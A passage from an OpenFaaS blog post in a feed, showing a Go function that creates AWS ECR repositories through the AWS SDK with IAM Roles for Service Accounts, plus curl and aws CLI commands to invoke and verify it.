<p>You can learn more about the AWS SDK for Go in the <a href="https://docs.aws.amazon.com/sdk-for-go/v2/developer-guide/welcome.html">AWS documentation</a>.</p>

<p>Edit the functions handler to use the AWS SDK for Go:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">package</span> <span class="n">function</span>

<span class="k">import</span> <span class="p">(</span>
	<span class="s">"context"</span>
	<span class="s">"encoding/json"</span>
	<span class="s">"fmt"</span>
	<span class="s">"io"</span>
	<span class="s">"log"</span>
	<span class="s">"net/http"</span>
	<span class="s">"os"</span>
	<span class="s">"strings"</span>

	<span class="s">"github.com/aws/aws-sdk-go-v2/config"</span>
	<span class="s">"github.com/aws/aws-sdk-go-v2/service/ecr"</span>
	<span class="s">"github.com/aws/aws-sdk-go-v2/service/ecr/types"</span>
<span class="p">)</span>

<span class="k">type</span> <span class="n">CreateRepoReq</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">Name</span> <span class="kt">string</span> <span class="s">`json:"name"`</span>
<span class="p">}</span>

<span class="k">type</span> <span class="n">CreateRepoRes</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">Arn</span> <span class="kt">string</span> <span class="s">`json:"arn"`</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Handle</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">var</span> <span class="n">input</span> <span class="p">[]</span><span class="kt">byte</span>

	<span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">Body</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="k">defer</span> <span class="n">r</span><span class="o">.</span><span class="n">Body</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span>

		<span class="n">body</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadAll</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">Body</span><span class="p">)</span>

		<span class="n">input</span> <span class="o">=</span> <span class="n">body</span>
	<span class="p">}</span>

	<span class="k">var</span> <span class="n">createRepoReq</span> <span class="n">CreateRepoReq</span>
	<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">input</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">createRepoReq</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Invalid request body"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusBadRequest</span><span class="p">)</span>
			<span class="k">return</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span> <span class="o">==</span> <span class="m">0</span> <span class="p">{</span>
		<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Missing in body: name"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusBadRequest</span><span class="p">)</span>
		<span class="k">return</span>
	<span class="p">}</span>

	<span class="n">cfg</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">config</span><span class="o">.</span><span class="n">LoadDefaultConfig</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span>
		<span class="n">config</span><span class="o">.</span><span class="n">WithRegion</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Getenv</span><span class="p">(</span><span class="s">"AWS_REGION"</span><span class="p">)))</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="n">log</span><span class="o">.</span><span class="n">Fatalf</span><span class="p">(</span><span class="s">"unable to load SDK config, %v"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
	<span class="p">}</span>

	<span class="c">// Using the Config value, create the ECR client</span>
	<span class="n">svc</span> <span class="o">:=</span> <span class="n">ecr</span><span class="o">.</span><span class="n">NewFromConfig</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span>

	<span class="c">// Check if the repository already exists</span>
	<span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">svc</span><span class="o">.</span><span class="n">DescribeRepositories</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span> <span class="o">&amp;</span><span class="n">ecr</span><span class="o">.</span><span class="n">DescribeRepositoriesInput</span><span class="p">{</span>
		<span class="n">RepositoryNames</span><span class="o">:</span> <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">},</span>
	<span class="p">});</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="n">log</span><span class="o">.</span><span class="n">Printf</span><span class="p">(</span><span class="s">"Error describing repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">())</span>
		<span class="k">if</span> <span class="o">!</span><span class="n">strings</span><span class="o">.</span><span class="n">Contains</span><span class="p">(</span><span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">(),</span> <span class="s">"RepositoryNotFoundException"</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"Failed to describe repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">()),</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusInternalServerError</span><span class="p">)</span>
			<span class="k">return</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="c">// Create the repository</span>
	<span class="n">createRes</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">svc</span><span class="o">.</span><span class="n">CreateRepository</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span> <span class="o">&amp;</span><span class="n">ecr</span><span class="o">.</span><span class="n">CreateRepositoryInput</span><span class="p">{</span>
		<span class="n">RepositoryName</span><span class="o">:</span>     <span class="o">&amp;</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span>
		<span class="n">ImageTagMutability</span><span class="o">:</span> <span class="n">types</span><span class="o">.</span><span class="n">ImageTagMutabilityMutable</span><span class="p">,</span>
		<span class="n">EncryptionConfiguration</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">types</span><span class="o">.</span><span class="n">EncryptionConfiguration</span><span class="p">{</span>
			<span class="n">EncryptionType</span><span class="o">:</span> <span class="n">types</span><span class="o">.</span><span class="n">EncryptionTypeAes256</span><span class="p">,</span>
		<span class="p">},</span>
		<span class="n">ImageScanningConfiguration</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">types</span><span class="o">.</span><span class="n">ImageScanningConfiguration</span><span class="p">{</span>
			<span class="n">ScanOnPush</span><span class="o">:</span> <span class="no">false</span><span class="p">,</span>
		<span class="p">},</span>
	<span class="p">})</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"Failed to create repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">()),</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusInternalServerError</span><span class="p">)</span>
		<span class="k">return</span>
	<span class="p">}</span>

	<span class="n">w</span><span class="o">.</span><span class="n">WriteHeader</span><span class="p">(</span><span class="n">http</span><span class="o">.</span><span class="n">StatusCreated</span><span class="p">)</span>

	<span class="n">createRepoRes</span> <span class="o">:=</span> <span class="n">CreateRepoRes</span><span class="p">{</span>
		<span class="n">Arn</span><span class="o">:</span> <span class="o">*</span><span class="n">createRes</span><span class="o">.</span><span class="n">Repository</span><span class="o">.</span><span class="n">RepositoryArn</span><span class="p">,</span>
	<span class="p">}</span>
	<span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="n">createRepoRes</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="invoke-the-function-to-create-a-new-repository">Invoke the function to create a new repository</h2>

<p>Now you can use curl to create a repository:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8080/function/ecr-create-repo <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{"name":"tenant1/fn1"}'</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Content-type: application/json"</span>
</code></pre></div></div>

<p>The response contains the ARN of the repository, ready for you to use in something like the OpenFaaS Function Builder API to push a new image.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"arn"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:ecr:eu-west-1:ACCOUNT_NUMBER:repository/tenant1/fn1"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>You should see the repository created in AWS Console.</p>

<p>You can also verify this from the command line:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images <span class="nt">--repository-name</span> tenant1/fn1 <span class="nt">--region</span> eu-west-1

aws ecr describe-repositories <span class="nt">--repository-name</span> tenant1/fn1 <span class="nt">--region</span> eu-west-1
</code></pre></div></div>

<h2 id="wrapping-up-and-next-steps">Wrapping up and next steps</h2>

<p>In a very short period of time, we created a function using the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template, added the AWS SDK for Go as a dependency, and used it to create a repository in ECR.</p>

<p>This is required step to push new images to an AWS ECR registry, and could form part of a CI/CD pipeline, or a multi-tenant functions platform.</p>

<p>With a few simple steps, you can take code in the form of a plain files, a zip file, tar file, or Git repository, and turn it into a function.</p>

<ol>
  <li>Create a tenant namespace using the <a href="https://docs.openfaas.com/reference/rest-api/#create-a-namespace">OpenFaaS Gateway’s REST API</a> i.e. <code class="language-plaintext highlighter-rouge">tenant</code></li>
  <li>Create a repository for the tenant’s new function you want to build i.e. <code class="language-plaintext highlighter-rouge">tenant/fn1</code></li>
  <li>Use the <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder’s API</a> to publish the image to the full ARN path i.e. <code class="language-plaintext highlighter-rouge">ACCOUNT_NUMBER.dkr.ecr.eu-west-1.amazonaws.com/tenant1/fn1:TAG</code></li>
  <li>Post a request to the <a href="https://docs.openfaas.com/reference/rest-api/#deploy-a-function">OpenFaaS Gateway’s REST API</a> to deploy the function to the <code class="language-plaintext highlighter-rouge">tenant1</code> namespace</li>
</ol>

<p>Highlights of this approach:</p>

<ul>
  <li>The function operates with AWS IAM, using least privilege principles.</li>
  <li>The function obtains ambient credentials from the Kubernetes Service Account, using IRSA instead of shared, long-lived credentials.</li>
  <li>The function can be deployed to Kubernetes rapidly using the same workflows and tools you already use with Kubernetes.</li>
</ul>

<p>To take things further, consider authentication options for the function.</p>

<ol>
  <li><a href="https://docs.openfaas.com/openfaas-pro/iam/function-authentication/">Built-in Function Authentication using OpenFaaS IAM</a>.</li>
  <li>Your own code in the handler to process an Authorization header with a static key or JWT token.</li>
</ol>

<p>We wrote to the AWS API directly, however you can use the <a href="https://docs.openfaas.com/openfaas-pro/sqs-events/">Event Connectors for AWS SQS or SNS</a> to receive events from other AWS services such as S3, DynamoDB, etc.</p>

<p>The same technique can be applied for other APIs such as the Kubernetes API, for when you want a function to obtain an identity to manage resources in one or more Kubernetes clusters: <a href="https://www.openfaas.com/blog/access-kubernetes-from-a-function/">Learn how to access the Kubernetes API from a Function</a>.</p>

<p>You may also like to learn how to run OpenFaaS as a multi-tenant platform:</p>

<ul>
  <li>High-level overview and customer stories - <a href="https://www.openfaas.com/blog/add-a-faas-capability/">Integrate FaaS Capabilities into Your Platform with OpenFaaS</a>]</li>
  <li>Deep dive into technical details - <a href="https://www.openfaas.com/blog/build-a-multi-tenant-functions-platform/">Build a multi-tenant functions platform</a>.</li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="aws" /><category term="identity" /><category term="rbac" /><summary type="html"><![CDATA[We show you how to create AWS ECR repositories from a function written in Go using IAM Roles for Service Accounts.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-irsa/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-irsa/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>